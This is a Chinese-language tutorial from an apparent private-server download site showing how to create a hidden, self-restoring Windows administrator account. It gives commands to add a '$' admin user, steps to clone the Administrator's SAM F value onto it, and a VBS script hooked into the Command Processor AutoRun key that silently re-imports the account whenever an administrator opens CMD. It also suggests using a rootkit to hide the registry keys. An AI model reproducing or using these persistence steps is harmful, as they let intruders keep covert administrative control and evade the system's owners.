大家好，今天给大家做的动画是建立不死帐户。

1.首先我们在DOS下建立一个用户

net user yecha$ yecha /add
建立用户yecha$

net localgroup administrators yecha$ /add
将yecha$提升到管理员组

2.接着打开注册表，输入：regedit，我们找到HKEY_LOCAL_MACHINE\SAM\SAM，这个时候SAM项是打不开的，我们要给他相应的权限。添加你现在登陆系统的用户，给他完全控制的权限，然后刷新，就可以打开！

HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names  来到这里，我们找到刚刚建立的用户
yecha$。再将yecha$的相关项导出，yecha$对用的F值导出。最后导出administrator的F值。

3.在DOS下将yecha$用户删除，然后我们将administrator的F值复制给yecha$。
  将修改后的yecha$注册表信息导入注册表。

4.OK，这个时候大家可能会问这样做有什么意思呢？而且这种简单的建立帐户早就会了。当然我知道很多朋友都会这种方法来建立隐藏帐户，因为到了这一步的时候在CMD下和本地用户和组里都查看不到我们建立的这个用户！唯一存在的就是在我们的注册表里仍然有这个用户。

说到这里，我想到的就是两种思路:
一是想办法在注册表里将我们的这个用户所在注册表的键值隐藏。
二是管理员在注册表里把我们的这个用户所在注册表的键值删掉后，我们怎么能让它再自动创建。

第一种方法我不想讲了，如果大家这几天一直看我教程的话，就知道用rootkit就可以隐藏注册表键值。
用ROOTKIT这款DOS下的超级隐藏工具完全可以轻松做到这一点！

第二种方法就是今天我讲到的。

KEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\AutoRun
在注册表中这个项起什么作用大家知道吗？没错，他起到的作用就是打开CMD自动运行我们编辑好的脚本文件。只要在AutoRun键值中输入我们的脚本路径就OK。

那我们可以建立一个自动导入注册表的脚本文件：

On Error Resume Next

set yecha=wscript.createobject("wscript.shell")

yecha.run "regedit.exe /s yecha$.reg",0 

yecha.run "regedit.exe /s yechaF.reg",0

将它保存为VBS文件后，放到一个隐蔽的路径下。  好，这个时候我们手工把注册表里的yecha$这个键值删掉，模仿管理员的操作。 好，我们删掉，可是管理员会经常使用CMD命令查看一些信息，这个时候比如管理员要查看机器开了哪些端口，他就执行CMD命令.看，他刚刚打开CMD窗口，结果我们的用户信息又都回来了。。。怎么样？很好的方法吧？

这样当我们每次运行CMD命令的时候就会自动运行我们的脚本文件。思路就是这样了。

那我们实验以下，我们能用yecha$这个用户登陆不。等一下，机器有点卡了。没有问题！

好了，今天的教程就做到这，如果有什么不懂的可以加QQ群：47688744  新建不到4天。希望大家多来交流。。。

• [VIP 线路 - 电信高速下载][非高级会员不可下载]
• [VIP 线路 - 双线高速下载][非高级会员不可下载]

• ☉ 创建不死帐号

• ☉ 由于私服程序的特殊性，它非常容易被杀毒误报，所以自2011年1月起本站所有软件都不在做杀毒查杀，请下载后自行检测查杀！
• ☉ 为了达到最快的下载速度，推荐使用 迅雷5 下载本站软件。
• ☉ 本站软件均为WinRAR5.6版本压缩，所以请一定升级到WinRAR5.6或最新版才能正常解压本站提供的软件!
• ☉ 如果您发现下载链接错误，或内容与分类不匹配，请点击报告错误。正确报错10个我们将送您VIP会员！
• ☉ 如发现本站软件需要解压密码，均为：www.987654321sf.com